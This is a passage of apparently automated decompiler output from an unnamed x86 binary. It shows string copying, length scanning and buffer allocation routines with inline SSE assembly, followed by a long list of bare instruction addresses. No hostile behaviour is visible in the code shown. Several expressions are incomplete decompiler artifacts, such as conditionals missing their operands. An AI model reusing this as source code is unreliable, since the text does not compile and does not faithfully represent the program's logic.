										 *_t505 = 0;
										while(1) {
											_t595 = _t595 + 1;
											_t491 =  *((char*)(_t595 + _t665 - 1));
											 *((char*)(_t595 + _t505 - 1)) = _t491;
											if(_t700 != 0 && _t595 == _t700) {
												break;
											}
											if(_t491 != 0) {
												continue;
											} else {
											}
											goto L67;
										}
										 *((char*)(_t595 + _t505)) = 0;
									} else {
										_t505 = 0;
									}
								}
							}
							L67:
							_t551 = _v64;
							_t681 =  *((intOrPtr*)( *((intOrPtr*)(_v40 + 4)) + _t551 * 4 - 4));
							_t416 =  *_t681;
							if(_t416 != _t505) {
								if(_t505 == 0 ||  *_t505 == 0) {
									if(_t416 != 0) {
										 *_t416 = 0;
									}
									if( *(_t681 + 4) < 0x40) {
										_push(0x40);
										_v72 = E008A1030();
										_t723 = _t723 + 4;
										_t463 =  *_t681;
										if(_t463 == 0) {
											 *_v72 = 0;
										} else {
											if(_v72 != 0) {
												_t583 = _v72;
												_t649 =  *_t463;
												 *_t583 = _t649;
												if(_t649 != 0) {
													_v84 = _t505;
													_t650 = 0;
													_t523 = _t583;
													while(1) {
														_t650 = _t650 + 1;
														_t584 =  *((char*)(_t463 + _t650 * 2 - 1));
														 *((char*)(_t523 + _t650 * 2 - 1)) = _t584;
														if(_t584 == 0) {
															break;
														}
														_t585 =  *((char*)(_t463 + _t650 * 2));
														 *((char*)(_t523 + _t650 * 2)) = _t585;
														if(_t585 != 0) {
															continue;
														}
														break;
													}
													_t505 = _v84;
												}
												_t463 =  *_t681;
											}
											_push(1);
											_push(_t463);
											E008A10B0();
											_t723 = _t723 + 8;
										}
										 *_t681 = _v72;
										 *(_t681 + 4) = 0x40;
									}
								} else {
									_t652 = _t505 & 0x0000000f;
									if(_t652 == 0) {
										L74:
										asm("pxor xmm1, xmm1");
										_t714 =  ~( ~_t652 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+edx]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb ecx, xmm0");
											if(_t551 != 0) {
												break;
											}
											_t652 = _t652 + 0x10;
											if(_t652 < _t714) {
												continue;
											} else {
												if(_t714 >= 0x7fffffff) {
													L80:
													_t714 = 0x7fffffff;
												} else {
													while( *((char*)(_t714 + _t505)) != 0) {
														_t714 = _t714 + 1;
														if(_t714 < 0x7fffffff) {
															continue;
														} else {
															goto L80;
														}
														goto L81;
													}
													goto L270;
												}
											}
											goto L81;
										}
										asm("bsf esi, ecx");
										_t714 = _t714 + _t652;
										goto L270;
									} else {
										_t714 = 0;
										_t652 =  ~_t652 + 0x10;
										while( *((char*)(_t714 + _t505)) != 0) {
											_t714 = _t714 + 1;
											if(_t714 < _t652) {
												continue;
											} else {
												goto L74;
											}
											goto L81;
										}
										L270:
										if(_t714 == 0xffffffff && _t416 != 0) {
											 *_t416 = 0;
										}
									}
									L81:
									_t57 = _t714 + 1; // -2147483661
									_t654 =  <=  ? 0x40 : _t57;
									if(_t654 >  *(_t681 + 4)) {
										_v68 = (_t654 >> 5 >> 0x1a) + _t654 >> 6;
										_t655 = _t654 & 0x8000003f;
										if(_t655 < 0) {
											_t655 = (_t655 - 0x00000001 | 0xffffffc0) + 1;
										}
										_t658 = _v68 + (0 | _t655 > 0x00000000) << 6;
										_v68 = _t658;
										_push(_t658);
										_t586 = E008A1030();
										_t723 = _t723 + 4;
										_t659 =  *_t681;
										if(_t659 == 0) {
											 *_t586 = 0;
										} else {
											if(_t586 != 0) {
												_t479 =  *_t659;
												 *_t586 = _t479;
												if(_t479 != 0) {
													_v80 = _t681;
													_v84 = _t505;
													_t524 = 0;
													while(1) {
														_t524 = _t524 + 1;
														_t481 =  *((char*)(_t659 + _t524 * 2 - 1));
														 *((char*)(_t586 + _t524 * 2 - 1)) = _t481;
														if(_t481 == 0) {
															break;
														}
														_t482 =  *((char*)(_t659 + _t524 * 2));
														 *((char*)(_t586 + _t524 * 2)) = _t482;
														if(_t482 != 0) {
															continue;
														}
														break;
													}
													_t681 = _v80;
													_t505 = _v84;
												}
												_t659 =  *_t681;
											}
											_push(1);
											_push(_t659);
											_v76 = _t586;
											E008A10B0();
											_t586 = _v76;
											_t723 = _t723 + 8;
										}
										 *(_t681 + 4) = _v68;
										 *_t681 = _t586;
									} else {
										_t586 =  *_t681;
									}
									if(_t586 != 0 && _t505 != 0) {
										_t660 = 0;
										while(1) {
											_t660 = _t660 + 1;
											_t477 =  *((char*)(_t660 + _t505 - 1));
											 *((char*)(_t660 + _t586 - 1)) = _t477;
											if(_t714 != 0 && _t660 == _t714) {
												break;
											}
											if(_t477 != 0) {
												continue;
											} else {
											}
											goto L117;
										}
										 *((char*)(_t660 + _t586)) = 0;
									}
								}
							}
							L117:
							_push(1);
							_push(_t505);
							E008A10B0();
							_t723 = _t723 + 8;
							_t418 = _v40;
							_t552 =  *_t418;
						} while (_t552 > _v64);
						_t505 = _t418;
						_t604 = 0;
						_v48 = 0;
						asm("pxor xmm0, xmm0");
						if(_t552 <= 0) {
							if( &_v52 == _t505) {
								L288:
								_v52 = _t604;
								_v44 = _t604;
							} else {
								L287:
								_v44 = _t604;
								_v52 = _t604;
								 *_t505 = _t604;
								 *(_t505 + 8) = _t604;
								goto L196;
							}
						} else {
							_t371 = 0;
							_v44 = 0;
							_t682 = 0;
							_v60 = _t552;
							_v40 = _t505;
							do {
								_t682 = _t682 + 1;
								_t520 =  *( *( *((intOrPtr*)(_v40 + 4)) + _t682 * 4 - 4));
								if(_t520 != 0) {
									_t704 = _t520 & 0x0000000f;
									if(_t704 == 0) {
										L125:
										asm("pxor xmm1, xmm1");
										_v56 = _t682;
										_t565 =  ~( ~_t704 + 0x0000000f & 0x0000000f) + 0x7fffffff;
										while(1) {
											asm("movdqu xmm0, [ebx+esi]");
											asm("pcmpeqb xmm0, xmm1");
											asm("pmovmskb edi, xmm0");
											if(_t682 != 0) {
												break;
											}
											_t704 = _t704 + 0x10;
											if(_t704 < _t565) {
												continue;
											} else {
												_t682 = _v56;
												if(_t565 >= 0x7fffffff) {
													goto L131;
												} else {
													while( *((char*)(_t565 + _t520)) != 0) {
														_t565 = _t565 + 1;
														if(_t565 < 0x7fffffff) {
															continue;
														} else {
															goto L131;
														}
														goto L182;
													}
													goto L284;
												}
											}
											goto L182;
										}
										_t566 = _t682;
										asm("bsf ecx, ecx");
										_t682 = _v56;
										_t565 = _t566 + _t704;
										goto L284;
									} else {
										_t565 = 0;
										_t704 =  ~_t704 + 0x10;
										while( *((char*)(_t565 + _t520)) != 0) {
											_t565 = _t565 + 1;
											if(_t565 < _t704) {
												continue;
											} else {
												goto L125;
											}
											goto L182;
										}
										L284:
										if(_t565 != 0) {
											L131:
											_v52 = _t604;
											_t624 =  >  ? _t371 : 0;
											_t625 =  >=  ? _t371 : _t624;
											_v64 =  >=  ? _t371 : _t624;
											_t626 = _v44;
											if(_t371 == _t626) {
												_v44 = _t626 + 4;
												_push(0x10 + _t626 * 4);
												_t707 = E008A1030();
												E008A0C10(_t707, _v48, _v52 << 2);
												_push(4);
												_push(_v48);
												E008A10B0();
												_t723 = _t723 + 0x18;
												_v48 = _t707;
												_t371 = _v52;
											}
											_t419 = _t371 != _v64;
											if(_t371 != _v64) {
												E008A0BC0(_v48 + _v64 * 4 + 4, _v48 + _v64 * 4, _t419 << 2);
												_t723 = _t723 + 0xc;
											}
											_push(8);
											_t705 = E008A1030();
											_t723 = _t723 + 4;
											if(_t705 == 0) {
												_t705 = 0;
											} else {
												 *_t705 = 0;
												 *(_t705 + 4) = 0;
												if(_t520 == 0 ||  *_t520 == 0) {
													_push(0x40);
													_v80 = E008A1030();
													_t723 = _t723 + 4;
													_t431 =  *_t705;
													if(_t431 == 0) {
														 *_v80 = 0;
													} else {
														if(_v80 != 0) {
															_t568 = _v80;
															_t629 =  *_t431;
															 *_t568 = _t629;
															if(_t629 != 0) {
																_v56 = _t682;
																_t630 = 0;
																_t521 = _t568;
																while(1) {
																	_t630 = _t630 + 1;
																	_t569 =  *((char*)(_t431 + _t630 * 2 - 1));
																	 *((char*)(_t521 + _t630 * 2 - 1)) = _t569;
																	if(_t569 == 0) {
																		break;
																	}
																	_t570 =  *((char*)(_t431 + _t630 * 2));
																	 *((char*)(_t521 + _t630 * 2)) = _t570;
																	if(_t570 != 0) {
																		continue;
																	}
																	break;
																}
																_t682 = _v56;
															}
														}
														_push(1);
														_push(_t431);
														E008A10B0();
														_t723 = _t723 + 8;
													}
													 *_t705 = _v80;
													 *(_t705 + 4) = 0x40;
												} else {
													_t436 = _t520 & 0x0000000f;
													if(_t436 == 0) {
														L142:
														asm("pxor xmm1, xmm1");
														_t636 =  ~( ~_t436 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v72 = _t636;
														_t571 = _t636;
														while(1) {
															asm("movdqu xmm0, [ebx+eax]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb edx, xmm0");
															if(_t636 != 0) {
																break;
															}
															_t436 = _t436 + 0x10;
															if(_t436 < _t571) {
																continue;
															} else {
																_v72 = _t571;
																if(_v72 >= 0x7fffffff) {
																	L149:
																	_v72 = 0x7fffffff;
																} else {
																	_t451 = _t571;
																	while( *((char*)(_t451 + _t520)) != 0) {
																		_t451 = _t451 + 1;
																		if(_t451 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L149;
																		}
																		goto L150;
																	}
																	_v72 = _t451;
																}
															}
															goto L150;
														}
														asm("bsf edx, edx");
														_v72 = _t636 + _t436;
													} else {
														_v72 = 0;
														_t646 = _v72;
														_t436 =  ~_t436 + 0x10;
														while( *((char*)(_t646 + _t520)) != 0) {
															_t646 = _t646 + 1;
															if(_t646 < _t436) {
																continue;
															} else {
																goto L142;
															}
															goto L150;
														}
														_v72 = _t646;
													}
													L150:
													_t143 = _v72 + 1; // 0x80000000
													_t573 =  <=  ? 0x40 : _t143;
													if(_t573 > 0) {
														_t442 = (_t573 >> 5 >> 0x1a) + _t573 >> 6;
														_v76 = _t442;
														_t574 = _t573 & 0x8000003f;
														if(_t574 < 0) {
															_t574 = (_t574 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t641 = _t442 + (0 | _t574 > 0x00000000) << 6;
														_v76 = _t641;
														_push(_t641);
														_t445 = E008A1030();
														_v68 = _t445;
														_t723 = _t723 + 4;
														_t642 =  *_t705;
														if(_t642 == 0) {
															 *_t445 = 0;
														} else {
															if(_v68 != 0) {
																_t576 = _t445;
																_t449 =  *_t642;
																 *_t576 = _t449;
																if(_t449 != 0) {
																	_v84 = _t520;
																	_t450 = 0;
																	_v56 = _t682;
																	_t522 = _t576;
																	while(1) {
																		_t450 = _t450 + 1;
																		_t577 =  *((char*)(_t642 + _t450 * 2 - 1));
																		 *((char*)(_t522 + _t450 * 2 - 1)) = _t577;
																		if(_t577 == 0) {
																			break;
																		}
																		_t578 =  *((char*)(_t642 + _t450 * 2));
																		 *((char*)(_t522 + _t450 * 2)) = _t578;
																		if(_t578 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t520 = _v84;
																	_t682 = _v56;
																}
															}
															_push(1);
															_push(_t642);
															E008A10B0();
															_t723 = _t723 + 8;
														}
														 *(_t705 + 4) = _v76;
														 *_t705 = _v68;
													} else {
														_v68 = 0;
													}
													if(_v68 != 0) {
														_v56 = _t682;
														_t447 = 0;
														_t575 = _v68;
														_t686 = _v72;
														while(1) {
															_t447 = _t447 + 1;
															_t644 =  *((char*)(_t447 + _t520 - 1));
															 *((char*)(_t447 + _t575 - 1)) = _t644;
															if(_t686 != 0 && _t447 == _t686) {
																break;
															}
															if(_t644 != 0) {
																continue;
															} else {
																_t682 = _v56;
															}
															goto L181;
														}
														_t682 = _v56;
														 *((char*)(_t447 + _v68)) = 0;
													}
												}
											}
											L181:
											 *((intOrPtr*)(_v48 + _v64 * 4)) = _t705;
											_t371 = _v52 + 1;
											_v60 =  *_v40;
											_t604 = _t371;
										} else {
										}
									}
								}
								L182:
							} while (_t682 < _v60);
							_t505 = _v40;
							_t683 =  &_v52;
							_t556 =  *(_t683 - 8);
							if(_t683 == _t505) {
								L253:
								_v52 = 0;
								_v44 = 0;
								_t604 = _v48;
								if(_t371 > 0) {
									_t675 = _t371 >> 1;
									if(_t675 == 0) {
										_t676 = 1;
									} else {
										_v40 = _t505;
										_t509 = _t371;
										_t694 = 0;
										do {
											_t532 =  *((intOrPtr*)(_t604 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + _t694 * 8)) != 0) {
												_push(1);
												E008A87B0(_t532);
												_t604 = _v52;
											}
											_t533 =  *((intOrPtr*)(_t604 + 4 + _t694 * 8));
											if( *((intOrPtr*)(_t604 + 4 + _t694 * 8)) != 0) {
												_push(1);
												E008A87B0(_t533);
												_t604 = _v52;
											}
											_t694 = _t694 + 1;
										} while (_t694 < _t675);
										_t534 = _t694;
										_t371 = _t509;
										_t505 = _v40;
										_t333 = _t534 + 1; // 0x2
										_t676 = _t694 + _t333;
									}
									_t334 = _t676 - 1; // 0x1
									if(_t334 < _t371) {
										_t530 =  *((intOrPtr*)(_t604 + _t676 * 4 - 4));
										if( *((intOrPtr*)(_t604 + _t676 * 4 - 4)) != 0) {
											_push(1);
											E008A87B0(_t530);
											_t604 = _v52;
										}
									}
								}
							} else {
								_v52 = _t604;
								 *_t505 = 0;
								 *(_t505 + 8) = 0;
								if(_t556 <= 0) {
									L196:
									_t605 =  *(_t505 + 4);
								} else {
									_t605 =  *(_t505 + 4);
									_t424 = _t556 >> 1;
									if(_t424 == 0) {
										_t425 = 1;
									} else {
										_v60 = _t556;
										_t685 = 0;
										_t702 = _t424;
										do {
											_t558 =  *((intOrPtr*)(_t605 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + _t685 * 8)) != 0) {
												_push(1);
												E008A87B0(_t558);
												_t605 =  *(_t505 + 4);
											}
											_t559 =  *((intOrPtr*)(_t605 + 4 + _t685 * 8));
											if( *((intOrPtr*)(_t605 + 4 + _t685 * 8)) != 0) {
												_push(1);
												E008A87B0(_t559);
												_t605 =  *(_t505 + 4);
											}
											_t685 = _t685 + 1;
										} while (_t685 < _t702);
										_t556 = _v60;
										_t217 = _t685 + 1; // 0x2
										_t425 = _t685 + _t217;
									}
									_t218 = _t425 - 1; // 0x1
									if(_t218 < _t556) {
										_t557 =  *((intOrPtr*)(_t605 + _t425 * 4 - 4));
										if( *((intOrPtr*)(_t605 + _t425 * 4 - 4)) != 0) {
											_push(1);
											E008A87B0(_t557);
											goto L196;
										}
									}
								}
								_push(4);
								_push(_t605);
								E008A10B0();
								_t723 = _t723 + 8;
								_t527 = _v52;
								 *(_t505 + 4) = 0;
								if(_t527 != 0) {
									_t672 = (_t527 - 0x00000001 >> 0x00000001 >> 0x0000001e) + _t527 - 0x00000001 & 0xfffffffc;
									_push(0x10 + _t672 * 4);
									 *(_t505 + 8) = _t672 + 4;
									_t368 = E008A1030();
									_t723 = _t723 + 4;
									_t610 = _v52;
									 *(_t505 + 4) = _t368;
									 *_t505 = _t610;
									if(_t610 <= 0) {
										goto L198;
									} else {
										_v40 = _t505;
										_t673 = 0;
										asm("pxor xmm0, xmm0");
										do {
											_push(8);
											_t673 = _t673 + 1;
											_t693 = E008A1030();
											_t723 = _t723 + 4;
											if(_t693 == 0) {
												_t693 = 0;
												_t508 = _t673 * 4;
											} else {
												_t376 = _t673 - 1;
												if(_t376 < 0 || _t376 >= _v52) {
													_t377 = 0;
													_t508 = _t673 * 4;
												} else {
													_t508 = _t673 * 4;
													_t377 =  *(_v48 + _t508 - 4);
												}
												 *_t693 = 0;
												 *(_t693 + 4) = 0;
												_t614 =  *_t377;
												if(_t614 == 0 ||  *_t614 == 0) {
													_push(0x40);
													_t378 = E008A1030();
													_v84 = _t378;
													_t723 = _t723 + 4;
													_t615 =  *_t693;
													if(_t615 == 0) {
														 *_t378 = 0;
													} else {
														if(_v84 != 0) {
															_t535 = _t378;
															_t381 =  *_t615;
															 *_t535 = _t381;
															if(_t381 != 0) {
																_v56 = _t693;
																_t382 = 0;
																_v64 = _t673;
																_t695 = _t535;
																while(1) {
																	_t382 = _t382 + 1;
																	_t548 =  *((char*)(_t615 + _t382 * 2 - 1));
																	 *((char*)(_t695 + _t382 * 2 - 1)) = _t548;
																	if(_t548 == 0) {
																		break;
																	}
																	_t549 =  *((char*)(_t615 + _t382 * 2));
																	 *((char*)(_t695 + _t382 * 2)) = _t549;
																	if(_t549 != 0) {
																		continue;
																	}
																	break;
																}
																_t693 = _v56;
																_t673 = _v64;
															}
														}
														_push(1);
														_push(_t615);
														E008A10B0();
														_t723 = _t723 + 8;
													}
													 *_t693 = _v84;
													 *(_t693 + 4) = 0x40;
												} else {
													_t537 = _t614 & 0x0000000f;
													if(_t537 == 0) {
														L212:
														asm("pxor xmm1, xmm1");
														_t388 =  ~( ~_t537 + 0x0000000f & 0x0000000f) + 0x7fffffff;
														_v60 = _t388;
														_v64 = _t673;
														_t677 = _t388;
														while(1) {
															asm("movdqu xmm0, [edx+ecx]");
															asm("pcmpeqb xmm0, xmm1");
															asm("pmovmskb eax, xmm0");
															if(_t388 != 0) {
																break;
															}
															_t537 = _t537 + 0x10;
															if(_t537 < _t677) {
																continue;
															} else {
																_v60 = _t677;
																_t673 = _v64;
																if(_v60 >= 0x7fffffff) {
																	L219:
																	_v60 = 0x7fffffff;
																} else {
																	_t407 = _v60;
																	while( *((char*)(_t407 + _t614)) != 0) {
																		_t407 = _t407 + 1;
																		if(_t407 < 0x7fffffff) {
																			continue;
																		} else {
																			goto L219;
																		}
																		goto L220;
																	}
																	goto L279;
																}
															}
															goto L220;
														}
														asm("bsf eax, eax");
														_t673 = _v64;
														_v60 = _t388 + _t537;
													} else {
														_v60 = 0;
														_t407 = _v60;
														_t537 =  ~_t537 + 0x10;
														while( *((char*)(_t407 + _t614)) != 0) {
															_t407 = _t407 + 1;
															if(_t407 < _t537) {
																continue;
															} else {
																goto L212;
															}
															goto L220;
														}
														L279:
														_v60 = _t407;
													}
													L220:
													_t392 =  <=  ? 0x40 : _v60 + 1;
													if(_t392 > 0) {
														_t543 = (_t392 >> 5 >> 0x1a) + _t392 >> 6;
														_v72 = _t543;
														_t393 = _t392 & 0x8000003f;
														if(_t393 < 0) {
															_t393 = (_t393 - 0x00000001 | 0xffffffc0) + 1;
														}
														_t545 = _t543 + (0 | _t393 > 0x00000000) << 6;
														_v72 = _t545;
														_push(_t545);
														_v76 = _t614;
														_t396 = E008A1030();
														_t614 = _v76;
														_t546 = _t396;
														_t723 = _t723 + 4;
														_t397 =  *_t693;
														_v68 = _t397;
														if(_t397 == 0) {
															 *_t546 = 0;
														} else {
															if(_t546 != 0) {
																_t403 =  *_t397;
																 *_t546 = _t403;
																if(_t403 != 0) {
																	_v56 = _t693;
																	_t404 = 0;
																	_v76 = _t614;
																	_v64 = _t673;
																	_t697 = _v68;
																	while(1) {
																		_t404 = _t404 + 1;
																		_t616 =  *((char*)(_t697 + _t404 * 2 - 1));
																		 *((char*)(_t546 + _t404 * 2 - 1)) = _t616;
																		if(_t616 == 0) {
																			break;
																		}
																		_t617 =  *((char*)(_t697 + _t404 * 2));
																		 *((char*)(_t546 + _t404 * 2)) = _t617;
																		if(_t617 != 0) {
																			continue;
																		}
																		break;
																	}
																	_t693 = _v56;
																	_t614 = _v76;
																	_t673 = _v64;
																}
															}
															_push(1);
															_push(_v68);
															_v80 = _t546;
															_v76 = _t614;
															E008A10B0();
															_t614 = _v76;
															_t546 = _v80;
															_t723 = _t723 + 8;
														}
														 *(_t693 + 4) = _v72;
														 *_t693 = _t546;
													} else {
														_t546 = 0;
													}
													if(_t546 != 0) {
														_v64 = _t673;
														_v56 = _t693;
														_t696 = 0;
														_t678 = _v60;
														while(1) {
															_t696 = _t696 + 1;
															_t400 =  *((char*)(_t696 + _t614 - 1));
															 *((char*)(_t696 + _t546 - 1)) = _t400;
															if(_t678 != 0 && _t696 == _t678) {
																break;
															}
															if(_t400 != 0) {
																continue;
															} else {
																_t693 = _v56;
																_t673 = _v64;
															}
															goto L251;
														}
														_t693 = _v56;
														_t673 = _v64;
														 *((char*)(_t696 + _t546)) = 0;
													}
												}
											}
											L251:
											_t612 = _v40;
											 *( *((intOrPtr*)(_t612 + 4)) + _t508 - 4) = _t693;
										} while (_t673 <  *_t612);
										_t505 = _t612;
										_t371 = _v52;
										goto L253;
									}
								} else {
									L198:
									_v52 = 0;
									_v44 = 0;
									_t604 = _v48;
								}
							}
						}
					}
					_push(4);
					_push(_t604);
					E008A10B0();
					_v48 = 0;
					return _t505;
				}
				L301:
			}

0x008b3ec9
0x008b3ecc
0x008b3ece
0x008b3ed1
0x008b4b36
0x008b3ed7
0x008b3ed7
0x008b4c80
0x008b4c8c
0x008b4c90
0x00000000
0x008b4c92
0x00000000
0x008b4c92
0x008b3edd
0x008b3edf
0x008b3ee3
0x008b3ee7
0x008b3eeb
0x008b3ef3
0x008b3ef7
0x008b3efd
0x008b3f03
0x008b3f0b
0x008b3f0f
0x008b3f13
0x008b3f17
0x008b4c77
0x008b4c79
0x008b3f1d
0x008b3f1f
0x008b3f22
0x008b3f3a
0x008b3f3e
0x008b3f4a
0x008b3f4f
0x008b3f4f
0x008b3f54
0x008b3f58
0x008b3f5e
0x00000000
0x00000000
0x008b3f64
0x008b3f69
0x00000000
0x008b3f6b
0x008b3f70
0x008b3f84
0x008b3f84
0x00000000
0x008b3f72
0x008b3f72
0x008b3f7c
0x008b3f82
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b3f82
0x00000000
0x008b3f72
0x008b3f70
0x00000000
0x008b3f69
0x008b4c70
0x008b4c73
0x00000000
0x008b3f24
0x008b3f26
0x008b3f28
0x008b3f2b
0x008b3f35
0x008b3f38
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b3f38
0x008b4c61
0x008b4c63
0x008b3f89
0x008b3f89
0x008b3f8e
0x008b3f90
0x008b3f99
0x008b3f99
0x008b3f9e
0x00000000
0x00000000
0x008b3fa9
0x00000000
0x00000000
0x00000000
0x008b3fa9
0x008b4c53
0x008b4c56
0x00000000
0x008b4c5c
0x00000000
0x008b4c5c
0x00000000
0x008b4c56
0x008b4c69
0x008b4c69
0x008b4c69
0x008b4c63
0x008b3f22
0x008b3fab
0x008b3fad
0x008b3fae
0x008b3fb2
0x008b3fb8
0x008b3fc0
0x008b3fc1
0x008b3fc5
0x008b3fca
0x008b3fce
0x008b3fd2
0x008b3fd6
0x008b3fe0
0x008b3fe3
0x008b3fe3
0x008b3fe8
0x00000000
0x00000000
0x008b3ff3
0x00000000
0x00000000
0x00000000
0x008b3ff3
0x008b4c36
0x008b4c37
0x008b4c38
0x008b4c3d
0x00000000
0x008b4c43
0x00000000
0x008b4c43
0x00000000
0x008b4c3d
0x008b3ff5
0x008b3ff5
0x008b3ff9
0x008b3ff9
0x008b3fff
0x008b417f
0x008b417f
0x008b4186
0x008b4188
0x008b418b
0x008b4005
0x008b4007
0x008b4c2f
0x008b400d
0x008b400f
0x008b4012
0x008b4026
0x008b402a
0x008b4036
0x008b403b
0x008b403b
0x008b4040
0x008b4044
0x008b404a
0x00000000
0x00000000
0x008b4050
0x008b4055
0x00000000
0x008b4057
0x008b405c
0x008b406c
0x008b406c
0x00000000
0x008b405e
0x008b4064
0x008b406a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b406a
0x008b405e
0x008b405c
0x00000000
0x008b4055
0x008b4c25
0x008b4c28
0x008b4014
0x008b4016
0x008b4018
0x008b401b
0x008b4021
0x008b4024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4024
0x008b401b
0x008b4012
0x008b4071
0x008b4075
0x008b407a
0x008b407d
0x008b4081
0x008b4087
0x008b4087
0x008b408d
0x00000000
0x008b409d
0x008b409f
0x008b40a1
0x008b40a6
0x008b40a9
0x008b40bd
0x008b40c1
0x008b40cd
0x008b40d3
0x008b40d3
0x008b40d8
0x008b40dc
0x008b40e2
0x00000000
0x00000000
0x008b40e8
0x008b40ed
0x00000000
0x008b40ef
0x008b40f5
0x008b4106
0x008b4106
0x00000000
0x008b40f7
0x008b40fd
0x008b4104
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4104
0x008b40f7
0x008b40f5
0x00000000
0x008b40ed
0x008b4b40
0x008b4b43
0x008b40ab
0x008b40ad
0x008b40af
0x008b40b2
0x008b40b8
0x008b40bb
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b40bb
0x008b40b2
0x008b40a9
0x008b410b
0x008b4110
0x008b4116
0x008b411b
0x008b412b
0x008b412e
0x008b4134
0x008b413c
0x008b413c
0x008b4149
0x008b414a
0x008b4157
0x008b4159
0x008b415c
0x008b415e
0x008b4160
0x008b4163
0x008b4163
0x008b4164
0x008b4169
0x008b416f
0x00000000
0x00000000
0x008b417b
0x00000000
0x00000000
0x008b417d
0x00000000
0x008b417b
0x008b4b37
0x008b411d
0x008b411d
0x008b411d
0x008b411b
0x008b408d
0x008b418e
0x008b4192
0x008b4199
0x008b419d
0x008b41a1
0x008b41a9
0x008b4311
0x008b4313
0x008b4313
0x008b431a
0x008b431c
0x008b4323
0x008b4327
0x008b432a
0x008b432e
0x008b437a
0x008b4330
0x008b4335
0x008b4337
0x008b433b
0x008b433e
0x008b4342
0x008b4344
0x008b4347
0x008b4349
0x008b434b
0x008b434b
0x008b434c
0x008b4351
0x008b4357
0x00000000
0x00000000
0x008b4359
0x008b435d
0x008b4362
0x00000000
0x00000000
0x00000000
0x008b4362
0x008b4364
0x008b4364
0x008b4367
0x008b4367
0x008b4369
0x008b436b
0x008b436c
0x008b4371
0x008b4371
0x008b4381
0x008b4383
0x008b4383
0x008b41b8
0x008b41ba
0x008b41bd
0x008b41d5
0x008b41d9
0x008b41e5
0x008b41eb
0x008b41eb
0x008b41f0
0x008b41f4
0x008b41fa
0x00000000
0x00000000
0x008b4200
0x008b4205
0x00000000
0x008b4207
0x008b420d
0x008b4222
0x008b4222
0x008b420f
0x008b420f
0x008b4219
0x008b4220
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4220
0x00000000
0x008b420f
0x008b420d
0x00000000
0x008b4205
0x008b4b6c
0x008b4b6f
0x00000000
0x008b41bf
0x008b41c1
0x008b41c3
0x008b41c6
0x008b41d0
0x008b41d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b41d3
0x008b4b53
0x008b4b56
0x008b4b64
0x008b4b64
0x008b4b56
0x008b4227
0x008b422c
0x008b4232
0x008b4238
0x008b424e
0x008b4252
0x008b4258
0x008b4260
0x008b4260
0x008b426e
0x008b4271
0x008b4275
0x008b427b
0x008b427d
0x008b4280
0x008b4284
0x008b42d5
0x008b4286
0x008b4288
0x008b428a
0x008b428d
0x008b4291
0x008b4295
0x008b4299
0x008b429c
0x008b429e
0x008b429e
0x008b429f
0x008b42a4
0x008b42aa
0x00000000
0x00000000
0x008b42ac
0x008b42b0
0x008b42b5
0x00000000
0x00000000
0x00000000
0x008b42b5
0x008b42b7
0x008b42bb
0x008b42bb
0x008b42be
0x008b42be
0x008b42c0
0x008b42c2
0x008b42c3
0x008b42c7
0x008b42cc
0x008b42d0
0x008b42d0
0x008b42dc
0x008b42df
0x008b423a
0x008b423a
0x008b423a
0x008b42e3
0x008b42f1
0x008b42f3
0x008b42f3
0x008b42f4
0x008b42f9
0x008b42ff
0x00000000
0x00000000
0x008b430b
0x00000000
0x00000000
0x008b430d
0x00000000
0x008b430b
0x008b4b4a
0x008b4b4a
0x008b42e3
0x008b41a9
0x008b438a
0x008b438a
0x008b438c
0x008b438d
0x008b4392
0x008b4395
0x008b4399
0x008b439b
0x008b43a5
0x008b43a7
0x008b43a9
0x008b43b1
0x008b43b7
0x008b4c04
0x008b4c18
0x008b4c18
0x008b4c1c
0x008b4c06
0x008b4c06
0x008b4c06
0x008b4c0a
0x008b4c0e
0x008b4c10
0x00000000
0x008b4c10
0x008b43bd
0x008b43bd
0x008b43bf
0x008b43c7
0x008b43c9
0x008b43cd
0x008b43d1
0x008b43d5
0x008b43dd
0x008b43e1
0x008b43e9
0x008b43ec
0x008b4404
0x008b4408
0x008b4414
0x008b4418
0x008b441e
0x008b441e
0x008b4423
0x008b4427
0x008b442d
0x00000000
0x00000000
0x008b4433
0x008b4438
0x00000000
0x008b443a
0x008b443a
0x008b4444
0x00000000
0x008b4446
0x008b4446
0x008b4450
0x008b4457
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4457
0x00000000
0x008b4446
0x008b4444
0x00000000
0x008b4438
0x008b4be6
0x008b4be8
0x008b4beb
0x008b4bef
0x00000000
0x008b43ee
0x008b43f0
0x008b43f2
0x008b43f5
0x008b43ff
0x008b4402
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x008b4402
0x008b4bf1
0x008b4bf3
0x008b4459
0x008b4459
0x008b4461
0x008b4466
0x008b4469
0x008b446d
0x008b4473
0x008b4478
0x008b4483
0x008b4489
0x008b4498
0x008b449d
0x008b449f
0x008b44a3
0x008b44a8
0x008b44ab
0x008b44af
0x008b44af
0x008b44b3
0x008b44b7
0x008b44cd
0x008b44d2
0x008b44d2
0x008b44d5
0x008b44dc
0x008b44de
0x008b44e3
0x008b46f5
0x008b44e9
0x008b44eb
0x008b44ed
0x008b44f2
0x008b4685
0x008b468c
0x008b4690
0x008b4693
0x008b4697
0x008b46e3
0x008b4699
0x008b469e
0x008b46a0
0x008b46a4
0x008b46a7
0x008b46ab
0x008b46ad
0x008b46b1
0x008b46b3
0x008b46b5
0x008b46b5
0x008b46b6
0x008b46bb
0x008b46c1
0x00000000
0x00000000
0x008b46c3
0x008b46c7
0x008b46cc
0x00000000
0x00000000
0x00000000
0x008b46cc
